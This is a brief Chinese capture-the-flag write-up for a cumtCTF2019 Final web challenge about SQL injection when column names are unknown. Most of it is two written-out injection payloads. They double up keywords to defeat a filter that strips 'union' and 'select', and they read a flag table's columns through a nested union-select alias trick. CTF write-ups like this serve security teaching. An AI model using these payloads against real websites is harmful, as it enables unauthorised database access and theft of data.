不知列名SQL注入
Contents
前言
cumtCTF2019 Final中的一个web题
eeeeee………
因为太迟了,平台已经关闭了,
构造payload
ununionion selselectect 1,(e.2),3 from (selselectect * from (selselectect 1)a,(selselectect 2)b ununionion selselectect * from f1ag1nit)e limit 1,1 –+
?id=-1’ uniunionon seleselectct * from (seleselectct 1)x,(seleselectct 2)y,(seleselectct c.2 from (seleselectct * from (seleselectct 1)a,(seleselectct 2)b uniunionon seleselectct * from f1ag1nit)c limit 1,2)z –+